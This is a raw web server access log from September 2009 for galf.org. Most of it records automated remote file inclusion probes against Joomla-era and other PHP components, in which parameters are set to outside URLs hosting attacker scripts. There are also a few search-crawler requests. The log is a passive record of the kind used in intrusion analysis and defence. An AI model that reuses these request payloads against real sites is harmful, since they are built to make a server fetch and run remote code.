210.205.6.233 - - [20/Sep/2009:20:50:14 -0700] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.4pppp.com//icon1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:20:50:18 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:20:50:18 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:50:26 -0700] "GET /logs/com_calendar.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:20:50:26 -0700] "GET /com_calendar.php?mosConfig_absolute_path=%20family%20forumhttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
87.104.34.140 - - [20/Sep/2009:20:50:27 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.115.151 - - [20/Sep/2009:20:52:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:21:06:31 -0700] "GET /logs/errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
206.251.74.140 - - [20/Sep/2009:21:06:31 -0700] "GET /errors.php?error=http://www.gayawater.co.kr/technote/..../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
65.55.51.112 - - [20/Sep/2009:21:08:00 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:10:04 -0700] "GET /logs/?BBCodeFile=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:10:04 -0700] "GET /?BBCodeFile=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:10:46 -0700] "GET /?htmlclass_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:10:46 -0700] "GET /logs/?htmlclass_path=%20powered%202009http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:12:47 -0700] "GET /logs/?htmlclass_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:12:47 -0700] "GET /?htmlclass_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:13:27 -0700] "GET /logs/?BBCodeFile=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:13:27 -0700] "GET /?BBCodeFile=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
168.188.46.171 - - [20/Sep/2009:21:14:53 -0700] "GET /logs/access_090420.log/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
168.188.46.171 - - [20/Sep/2009:21:14:53 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
168.188.46.171 - - [20/Sep/2009:21:14:53 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:15:29 -0700] "GET /logs/?htmlclass_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:15:29 -0700] "GET /?htmlclass_path=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:18:38 -0700] "GET /?pageurl=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:18:38 -0700] "GET /logs/?pageurl=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
168.188.46.171 - - [20/Sep/2009:21:19:52 -0700] "GET /logs/access.log%20%20/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://leoboy1.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:20:16 -0700] "GET /logs//?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:20:16 -0700] "GET /?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:22:15 -0700] "GET /logs/access_090817.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:22:15 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:22:15 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:24:47 -0700] "GET /?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:24:47 -0700] "GET /logs//?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:25:50 -0700] "GET /logs/access_090817.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
121.125.74.87 - - [20/Sep/2009:21:26:45 -0700] "GET /logs/access_090601.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://sports.wisegiga.net/bbs/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:30:43 -0700] "GET /?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
77.222.40.247 - - [20/Sep/2009:21:30:44 -0700] "GET /logs//?path%5Bdocroot%5D=%20http://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:09 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:09 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:09 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:16 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:16 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:16 -0700] "GET /logs/access.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:37 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:37 -0700] "GET /logs/access_090413.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:37 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:43 -0700] "GET /logs/access_090413.log%20%20/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:43 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:31:43 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:19 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:20 -0700] "GET /logs/access_090420.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:25 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:25 -0700] "GET /logs/access_090420.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:25 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:27 -0700] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.73.17.7 - - [20/Sep/2009:21:33:30 -0700] "GET /logs/access_090706.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs/access_090406.log///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET //skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs/access_090831.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs/access_090504.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs/access_090406.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:35:58 -0700] "GET /logs/access_090504.log///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:13 -0700] "GET /logs/access_090518.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:13 -0700] "GET /logs/access_090601.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:26 -0700] "GET /logs/access_090316.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:31 -0700] "GET /logs/access_090713.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:31 -0700] "GET /logs/access_090330.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:31 -0700] "GET //skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:31 -0700] "GET /logs///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:31 -0700] "GET /logs/access.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:36 -0700] "GET /logs/access_090413.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:36 -0700] "GET /logs/access_090223.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:36 -0700] "GET /logs/access_090629.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:36:40 -0700] "GET /logs/access_090615.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:03 -0700] "GET /logs/access_090323.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:08 -0700] "GET /logs/access_090511.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:33 -0700] "GET /logs/access_090309.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:38 -0700] "GET /logs/access_090525.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:45 -0700] "GET /logs/access_090824.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:37:50 -0700] "GET /logs/access_090803.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:06 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:06 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:06 -0700] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:06 -0700] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:16 -0700] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.236.221.64 - - [20/Sep/2009:21:38:16 -0700] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://ccs.kaist.ac.kr/~ee301/EC2_07//bbs//id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:38:43 -0700] "GET /logs/access_090608.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:38:43 -0700] "GET /logs/access_090720.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:39:01 -0700] "GET /logs/access_090817.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:39:01 -0700] "GET /logs/access_090420.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
122.155.5.84 - - [20/Sep/2009:21:39:03 -0700] "GET /logs/access_090622.log%20%20///skin/zero_vote/login.php?dir=http://sports.wisegiga.net/bbs/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:00 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:01 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:01 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:01 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:01 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
204.200.197.136 - - [20/Sep/2009:21:41:01 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.geocities.com/cool_sasuke_uchiha/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /logs/access_090420.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /logs/access_090420.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [20/Sep/2009:21:42:35 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:42:38 -0700] "GET /?site=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
77.222.40.247 - - [20/Sep/2009:21:42:38 -0700] "GET /logs/?site=%20bussnisshttp://www.buckscountychurch.org/bcpcchoi/classes/template/test.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
